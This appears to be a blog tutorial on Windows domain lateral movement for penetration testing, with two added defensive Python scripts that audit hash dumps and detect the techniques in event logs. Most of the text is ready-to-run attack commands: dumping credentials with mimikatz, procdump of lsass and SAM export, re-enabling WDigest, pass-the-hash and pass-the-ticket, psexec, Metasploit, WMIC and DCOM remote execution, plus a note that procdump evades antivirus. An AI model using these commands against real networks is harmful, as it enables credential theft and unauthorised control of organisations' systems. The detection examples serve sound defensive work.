Lluna's Pure land.

What is life like when singing to wine?

Intranet Penetration Testing - Lateral Movement Within the Domain

0x01. Common Windows Remote Connections

1. IPC

Prerequisites: ports 139 and 445 are open, and the default administrative shares have not been disabled.

```
C:\Users\Administrator>net use \\10.10.10.20\ipc$ "11" /user:administrator
命令成功完成。

C:\Users\Administrator>net use
会记录新的网络连接。

状态 本地 远程 网络

-------------------------------------------------------------------------------
OK \\10.10.10.20\ipc$ Microsoft Windows Network
命令成功完成。
```

2. Gathering information with built-in Windows tools

Prerequisite: an ipc$ connection has already been established.

```
C:\Users\Administrator>dir \\10.10.10.20\c$
驱动器 \\10.10.10.20\c$ 中的卷没有标签。
卷的序列号是 AA35-C001

\\10.10.10.20\c$ 的目录

2021/06/22 14:58 1,379,216 accesschk.exe
2021/07/23 13:25 17,368 demo.ps1
2021/07/29 13:29 13,672 Get-GPPPassword.ps1
2021/07/13 17:11 38,616 nc.exe
2021/07/16 19:18 133,120 netview.exe
2009/07/14 11:20 <DIR> PerfLogs
2021/07/23 12:49 37,667 powercat.ps1
2021/07/28 21:01 600,580 PowerUp.ps1
2021/07/10 14:52 <DIR> Program Files
2021/07/16 18:04 <DIR> Program Files (x86)
2016/06/28 09:49 170,160 PsLoggedon.exe
2021/07/16 17:44 53,248 PVEFindADUser.exe
2021/07/17 15:29 974,235 SharpHound.ps1
2021/07/23 13:06 17,416 shell.ps1
2021/07/27 17:52 16,663 Sherlock.ps1
2021/07/11 11:27 <DIR> Users
2021/07/17 11:04 <DIR> Windows
12 个文件 3,451,961 字节
5 个目录 51,462,012,928 可用字节
```

3. Scheduled tasks

01. The at command (before Server 2008)

```
net time \\10.10.10.20    #check the target's system time
copy calc.bat \\10.10.10.20\c$ #copy the file to the target (its content is calc.exe)
at \\10.10.10.20 0:0AM c:\calc.bat #create a scheduled task
at \\10.10.10.20 id /delete #delete the scheduled task (id is the task id)
at \\10.10.10.20 0:0AM cmd.exe /c "ipconfig > c:/1.txt" #write command output to a file
type \\10.10.10.20\c$\1.txt #view the file
```

02. The schtasks command (Server 2008 and later)

```
schtasks /create /s 10.10.10.20 /tn demo /sc onstart /tr c:\calc.bat /ru system /f  #create a scheduled task named demo
schtasks /run /s 10.10.10.20 /i /tn "demo" #run the scheduled task
schtasks /delete /s 10.10.10.20 /tn "demo" /f #delete the scheduled task
net use \\10.10.10.20\ipc$ /del /y #remove the ipc$ connection
```

0x02. Obtaining Windows Password Hashes

LM Hash and NTLM Hash

An LM hash covers a password of at most 14 characters; from Server 2003 onward the NTLM hash is used instead.

1. Getpassword

```
Getpassword.exe

Authentication Id:0;363018
Authentication Package:Kerberos
Primary User:Administrator
Authentication Domain:JIYE

* User: Administrator
* Domain: JIYE
* Password: 11

Authentication Id:0;997
Authentication Package:Negotiate
Primary User:LOCAL SERVICE
Authentication Domain:NT AUTHORITY

* User:
* Domain:
* Password:

Authentication Id:0;996
Authentication Package:Negotiate
Primary User:WIN7DC1$
Authentication Domain:JIYE

* User: WIN7DC1$
* Domain: JIYE
* Password: 1G-\ K=Ae q-70DKy+%W7O:02'JrVV7P^w?A&Po\R./j9TSdQp2tc1W);vJN9.Q5Qov9 -l;`H%W4xcb>J.\m!n*x$bM2r4c`=*%)Mu"8TaBkTM]%Q%IpQs8

Authentication Id:0;47004
Authentication Package:NTLM
Primary User:
Authentication Domain:
(LUID ERROR)

Authentication Id:0;999
Authentication Package:Negotiate
Primary User:WIN7DC1$
Authentication Domain:JIYE

* User: WIN7DC1$
* Domain: JIYE
* Password: 1G-\ K=Ae q-70DKy+%W7O:02'JrVV7P^w?A&Po\R./j9TSdQp2tc1W);vJN9.Q5Qov9 -l;`H%W4xcb>J.\m!n*x$bM2r4c`=*%)Mu"8TaBkTM]%Q%IpQs8
```

2. PwDump7

```
PwDump7.exe

Administrator:500:NO PASSWORD*********************:31D6CFE0D16AE931B73C59D7E0C089C0:::
Guest:501:NO PASSWORD*********************:NO PASSWORD*********************:::
administration:1000:NO PASSWORD*********************:AE0597DC61A5C66B3A0600C60044C448:::
```

3. QuarksPwDump

```
QuarksPwDump.exe -h
```

4. Obtaining passwords from the SAM and SYSTEM files

(1) Export

```
reg save hklm\sam sam.hive
reg save hklm\system system.hive
```

(2) Extracting hashes with mimikatz

```
lsadump::sam /sam:sam.hive /system:system.hive  #sam.hive and system.hive are in the mimikatz directory
```

(3) Reading the local SAM directly with mimikatz

```
privilege::debug
token::elevate  #elevate to SYSTEM
lsadump::sam  #read the local SAM
sekurlsa::logonpasswords  #get plaintext passwords and NTLM hashes
```

(4) Reading the live SAM with mimikatz

```
mimikatz.exe "privilege::debug" "log" "sekurlsa::logonpasswords"
```

5. Reading lsass.dmp offline with mimikatz

The lsass.exe process holds plaintext passwords and hashes in memory.

Find the lsass.exe process (in Task Manager), right-click it and choose Create dump file to export it.

Export location: C:\Users\administrator\AppData\Local\Temp\lsass.exe

You can also export lsass.dmp with procdump.exe; procdump is an official Microsoft tool, so it is not flagged by antivirus.

```
procdump64.exe -accepteula -ma lsass.exe lsass.dmp
```

Extracting the hashes in lsass.dmp with mimikatz

```
sekurlsa::minidump lsass.dmp  #load the dump
sekurlsa::logonpasswords full  #extract
```

6. Dumping hashes with PowerShell

nishang script

```
PS C:\> Import-Module .\Get-PassHashes.ps1
PS C:\> Get-PassHashes
Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
administration:1000:aad3b435b51404eeaad3b435b51404ee:ae0597dc61a5c66b3a0600c60044c448:::
```
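The PwDump7 and Get-PassHashes outputs above both use the pwdump line format (user:RID:LM hash:NT hash:::). Added example, not code from the original post: a small auditor for that format from the defender's side, flagging accounts whose NT hash is the well-known empty-password value (31d6cfe0...) and accounts that still have a legacy LM hash stored. Note that on this page's own PwDump7 output the local Administrator's NT hash equals that empty-password value. The sample dump is constructed; the 'legacy' account and its hashes are made up.

```python
"""Audit a pwdump-style hash list (added example, not from the original post).
Each line reads user:RID:LM hash:NT hash::: as printed by PwDump7 and Get-PassHashes.
The constants are the well-known empty-password hashes; the sample dump is constructed."""

EMPTY_LM = "aad3b435b51404eeaad3b435b51404ee"  # LM hash of "" (also means: no LM hash stored)
EMPTY_NT = "31d6cfe0d16ae931b73c59d7e0c089c0"  # NT hash of "" (MD4 over UTF-16LE of "")

def parse_pwdump_line(line):
    """Return (user, rid, lm, nt) with hashes lower-cased; PwDump7's
    'NO PASSWORD***' marker is normalised to the empty-password constants."""
    parts = line.strip().split(":")
    if len(parts) < 4 or not parts[1].isdigit():
        raise ValueError(f"not a pwdump line: {line!r}")
    user, rid, lm, nt = parts[0], int(parts[1]), parts[2].lower(), parts[3].lower()
    if lm.startswith("no password"):
        lm = EMPTY_LM
    if nt.startswith("no password"):
        nt = EMPTY_NT
    return user, rid, lm, nt

def audit(dump_text):
    """Flag blank passwords and accounts that still have a legacy LM hash stored."""
    findings = []
    for line in dump_text.splitlines():
        if not line.strip():
            continue
        user, rid, lm, nt = parse_pwdump_line(line)
        if nt == EMPTY_NT:
            findings.append((user, "blank password"))
        if lm != EMPTY_LM:
            findings.append((user, "LM hash stored (NoLMHash policy off, password at most 14 chars)"))
    return findings

SAMPLE_DUMP = """
Administrator:500:NO PASSWORD*********************:31D6CFE0D16AE931B73C59D7E0C089C0:::
Guest:501:NO PASSWORD*********************:NO PASSWORD*********************:::
administration:1000:aad3b435b51404eeaad3b435b51404ee:ae0597dc61a5c66b3a0600c60044c448:::
legacy:1001:1122334455667788aabbccddeeff0011:ffeeddccbbaa99887766554433221100:::
"""  # constructed: the first three lines mirror this post, 'legacy' is a made-up account

if __name__ == "__main__":
    for user, issue in audit(SAMPLE_DUMP):
        print(f"{user}: {issue}")
```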

7. Loading mimikatz remotely with PowerShell to obtain passwords and hashes

```
powershell IEX (New-Object Net.WebClient).DownloadString('.\Invoke-Mimikatz.ps1');Invoke-Mimikatz
```

8. Grabbing passwords on a single machine

WDigest is disabled by default on Server 2012 and later; on versions below Server 2012 the plaintext password also cannot be retrieved if KB2871997 is installed.

Two ways to enable WDigest

(1) Using the reg add command

```
reg add HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLogonCredential /t REG_DWORD /d 1 /f  #enable
reg add HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLogonCredential /t REG_DWORD /d 0 /f  #disable
```

(2) PowerShell

```
Set-ItemProperty -Path HKLM:\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest -Name UseLogonCredential -Type DWORD -Value 1
Set-ItemProperty -Path HKLM:\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest -Name UseLogonCredential -Type DWORD -Value 0
```

0x03. Pass-the-Hash

1. Pass-the-hash with an NTLM hash

Environment

Domain: jiye.net

IP: 10.10.10.10

Username: administrator

NTLM Hash: ae0597dc61a5c66b3a0600c60044c448

```
mimikatz.exe "privilege::debug" "sekurlsa::pth /user:administrator /domain:jiye.net /ntlm:ae0597dc61a5c66b3a0600c60044c448"
```

In the cmd window that pops up (running as SYSTEM), enter:

```
dir \\DC\C$  #list the target folder on the domain controller
```

2. Pass-the-hash with an AES-256 key

The target system has KB2871997 installed.

0x04. Pass-the-Ticket

1. Pass-the-ticket with mimikatz

(1) Export the tickets held in memory

```
mimikatz.exe "privilege::debug" "sekurlsa::tickets /export"
```

(2) Purge the tickets held in memory

```
kerberos::purge
```

(3) Inject the high-privilege ticket into memory

```
kerberos::ptt c:\mimikatz\tickets\[0;24329]-2-0-40e10000-Administrator@krbtgt-JIYE.NET.kirbi
```

(4) List the target folder

```
dir \\DC\C$
```

2. Pass-the-ticket with kekeo

Environment

Domain: jiye.net

IP: 10.10.10.10

Username: administrator

NTLM Hash: ae0597dc61a5c66b3a0600c60044c448

(1) Generate a ticket

```
kekeo.exe "tgt::ask /user:administrator /domain:jiye.net /ntlm:ae0597dc61a5c66b3a0600c60044c448"
```

(2) Purge the tickets held in memory

```
kekeo# kerberos::purge
klist purge  #built into Windows
```

(3) Import the ticket

```
kerberos::ptt C:\TGT_administrator@JIYE.NET_krbtgt~jiye.net@JIYE.NET.kirbi
```

(4) List the target folder

```
dir \\DC\C$
```

0x05. Using psexec

1. psexec from the PsTools suite

(1) Get a SYSTEM shell (requires an ipc$ connection)

```
psexec.exe -accepteula \\10.10.10.10 -s cmd.exe
```

(2) Get an administrator shell

```
psexec.exe -accepteula \\10.10.10.10 cmd.exe
```

(3) Usage without an existing ipc$ connection

```
psexec.exe -accepteula \\10.10.10.10 -u administrator -p 11 cmd.exe
```

(4) Command output echo

```
psexec.exe -accepteula \\10.10.10.10 -s cmd.exe /c "ipconfig"
```

2. psexec in msf

```
msf6 > use exploit/windows/smb/psexec
msf6 exploit(windows/smb/psexec) > set rhosts 10.10.10.10
rhosts => 10.10.10.10
msf6 exploit(windows/smb/psexec) > set smbdomain jiye.net
smbdomain => jiye.net
msf6 exploit(windows/smb/psexec) > set smbuser administrator
smbuser => administrator
msf6 exploit(windows/smb/psexec) > set smbpass 11
smbpass => 11
msf6 exploit(windows/smb/psexec) > set lhost 10.10.10.130
lhost => 10.10.10.130
msf6 exploit(windows/smb/psexec) > run
```

0x08. Using WMIC

1. Built into Windows

```
wmic /node:10.10.10.10 /user:administrator /password:11 process call create "cmd.exe /c ipconfig > c:\ip.txt"
type \\10.10.10.10\c$\ip.txt
```

2. The impacket toolkit

Mainly used for moving from Linux to Windows.

```
wmiexec.py administrator:11@10.10.10.10
```

3. wmiexec.vbs calling WMI

(1) Get a SYSTEM shell

```
cscript.exe //nologo wmiexec.vbs /shell 10.10.10.10 administrator 11
```

(2) Command output echo

```
cscript.exe wmiexec.vbs /cmd 10.10.10.10 administrator 11 "ipconfig"
```

4. Invoke-WmiCommand.ps1

```
$User="jiye\administrator"  #username on the target system
$Password=ConvertTo-SecureString -String "11" -AsPlainText -Force  #password on the target system
$Cred=New-Object -TypeName System.Management.Automation.PSCredential -ArgumentList $User,$Password  #combine into a credential object
$Remote=Invoke-WmiCommand -Payload {ipconfig} -Credential $Cred -ComputerName 10.10.10.10  #execute
$Remote.PayloadOutput  #print the output
```

5. Invoke-WMIMethod

Built into PowerShell

```
$User="jiye\administrator"  #username on the target system
$Password=ConvertTo-SecureString -String "11" -AsPlainText -Force  #password on the target system
$Cred=New-Object -TypeName System.Management.Automation.PSCredential -ArgumentList $User,$Password  #combine into a credential object
Invoke-WMIMethod -Class Win32_Process -Name Create -ArgumentList "calc.exe" -ComputerName "10.10.10.10" -Credential $Cred  #run calc
```
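The techniques in sections 0x01 (ipc$ and scheduled tasks), 0x02.8 (re-enabling WDigest), 0x05 (psexec) and 0x08 (WMIC) each leave a distinct trace in Windows Security, System and Sysmon logs. Added example, not code from the original post: a minimal detection pass over simplified event records that flags admin-share access (Security 5140), remote task creation (Security 4698), PsExec's PSEXESVC service install (System 7045), the WDigest UseLogonCredential registry change (Sysmon 13) and a shell spawned by WmiPrvSE.exe (Sysmon 1). The events are plain dicts with the relevant fields of the real records, and the sample set is constructed to mirror the commands on this page.

```python
"""Detection logic (added example, not from the original post) for the lateral-movement
traces above. Events are simplified dicts carrying the fields the real Windows/Sysmon
records have; SAMPLE_EVENTS is constructed to mirror the commands in this post."""

WDIGEST_KEY = r"HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest\UseLogonCredential"

def classify(ev):
    """Return an alert string for one event, or None if it is benign."""
    eid, src = ev["id"], ev["source"]
    # Security 5140: a share ending in $ (ipc$, c$, admin$) was reached over the network
    if src == "Security" and eid == 5140 and ev.get("share", "").lower().endswith("$"):
        return f"admin share {ev['share']} opened from {ev['ip']} as {ev['user']}"
    # Security 4698: scheduled task created (the at / schtasks /s <host> step)
    if src == "Security" and eid == 4698:
        return f"scheduled task {ev['task']} created by {ev['user']}"
    # System 7045: PsExec installs its PSEXESVC service on the target on first use
    if src == "System" and eid == 7045 and "psexesvc" in ev.get("service", "").lower():
        return f"PsExec service {ev['service']} installed"
    # Sysmon 13: registry value set; UseLogonCredential=1 makes WDigest keep plaintext creds
    if (src == "Sysmon" and eid == 13 and ev.get("target", "").lower() == WDIGEST_KEY.lower()
            and "0x00000001" in ev.get("details", "")):
        return "WDigest UseLogonCredential enabled"
    # Sysmon 1: WmiPrvSE.exe spawning a shell is the wmic /node / wmiexec pattern
    if (src == "Sysmon" and eid == 1 and ev.get("parent", "").lower().endswith("wmiprvse.exe")
            and ev.get("image", "").lower().endswith(("cmd.exe", "powershell.exe"))):
        return f"WMI-spawned shell: {ev['image']}"
    return None

def scan(events):
    """Run classify() over a list of events and keep the alerts."""
    return [a for a in (classify(e) for e in events) if a]

SAMPLE_EVENTS = [  # constructed sample records, mirroring the commands in this post
    {"source": "Security", "id": 5140, "share": r"\\*\IPC$", "ip": "10.10.10.20", "user": "administrator"},
    {"source": "Security", "id": 5140, "share": r"\\*\public", "ip": "10.10.10.20", "user": "alice"},
    {"source": "Security", "id": 4698, "task": r"\demo", "user": "administrator"},
    {"source": "System", "id": 7045, "service": "PSEXESVC"},
    {"source": "Sysmon", "id": 13, "target": WDIGEST_KEY, "details": "DWORD (0x00000001)"},
    {"source": "Sysmon", "id": 1, "parent": r"C:\Windows\System32\wbem\WmiPrvSE.exe", "image": r"C:\Windows\System32\cmd.exe"},
    {"source": "Sysmon", "id": 1, "parent": r"C:\Windows\explorer.exe", "image": r"C:\Windows\System32\notepad.exe"},
]

if __name__ == "__main__":
    for alert in scan(SAMPLE_EVENTS):
        print(alert)
```

Security 5140 and 4698 only appear when the File Share and Other Object Access audit subcategories are enabled; Sysmon 13 needs a registry rule covering the WDigest key.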

0x09. smbexec

1. C++ version

2. impacket version

```
smbexec_impacket.exe jiye/administrator:11@10.10.10.10
```

3. Linux installed version

0x10. Using DCOM

1. Listing DCOM applications with PowerShell

```
Get-CimInstance Win32_DCOMApplication  #Server 2012 and later
Get-WmiObject -Namespace ROOT\CIMV2 -Class Win32_DCOMApplication  #Win 7, Server 2008, etc.
```

2. Executing system commands via DCOM

This runs calc.exe; in the same way, calc.exe can be replaced with a malicious program.

```
$com=[activator]::CreateInstance([type]::GetTypeFromProgID("MMC20.Application","127.0.0.1"))
$com.Document.ActiveView.ExecuteShellCommand('cmd.exe',$null,"/c calc.exe","Minimized")
```

3. Executing commands on a remote host via DCOM

Environment

Domain controller: DC (jiye.net)

IP: 10.10.10.10

user: administrator

pass: 11

Member server: WIN7

IP: 10.10.10.20

user: DC1

pass: 11

(1) First establish an ipc$ connection

```
net use \\10.10.10.10 "11" /user:jiye\administrator
```

(2) Invoke MMC20.Application to execute a command remotely

```
$com=[activator]::CreateInstance([type]::GetTypeFromProgID("MMC20.Application","10.10.10.20"))
$com.Document.ActiveView.ExecuteShellCommand('cmd.exe',$null,"/c calc.exe","Minimized")
```

(3) Invoke {9BA05972-F6A8-11CF-A442-00A0C90A8F39}

```
$com=[type]::GetTypeFromCLSID('9BA05972-F6A8-11CF-A442-00A0C90A8F39',"10.10.10.20")
$obj=[System.Activator]::CreateInstance($com)
$item=$obj.item()
$item.Document.Application.ShellExecute("cmd.exe","/c calc.exe","c:\windows\system32",$null,0)
```